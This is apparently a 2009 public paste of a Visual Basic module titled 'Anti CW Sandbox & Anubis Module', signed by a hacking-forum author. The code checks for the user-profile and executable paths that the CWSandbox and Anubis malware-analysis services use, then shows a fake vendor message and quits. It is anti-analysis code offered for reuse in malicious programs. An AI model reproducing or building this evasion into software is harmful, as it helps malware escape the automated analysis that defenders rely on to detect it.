Guest
Public paste!

h7labscom

By: a guest | Nov 8th, 2009 | Syntax: VisualBasic | Size: 1.19 KB | Hits: 101 | Expires: Never
Copy text to clipboard
  1. Attribute VB_Name = "Module1"
  2. '##############################################
  3. '#   Anti CW Sandbox & Anubis Module    #
  4. '#  -------------------------------------  #
  5. '# Module by haZl0oh for Os-Gentlemen.6x.to #
  6. '# Shoutz to EvAriZzl , h0yt3r,Mastermaefju #
  7. '# Ic3drag0n and OS-Gentlemen.6x.to Staff  #
  8. '# If u sue it gimme some shoutZ....     #
  9. '##############################################
  10.  
  11.  
  12. Public Sub cw_anub()
  13. ' Anti CW Sandbox
  14. '-------------------------
  15.  
  16. If Environ("userprofile") = "H:/Documents and Settings/User" Then
  17.     MsgBox "No emulation or Virtualisation of this application possible" & vbCrLf & "Please contact your Vendor for more information.", , "Vendor notification."
  18.  End
  19.    Else
  20.  
  21.  
  22.  
  23.  
  24.  
  25. 'ANTI Anubis
  26. '--------------------
  27. If App.Path & App.EXEName & ".exe" = "C:\sample.exe" Then
  28.     MsgBox "No emulation or Virtualisation of this application possible" & vbCrLf & "Please contact your Vendor for more information.", , "Vendor notification."
  29.   End
  30. Else
  31.     'MsgBox "Success...."
  32.  
  33.     End If
  34.     End If
  35.    
  36. end sub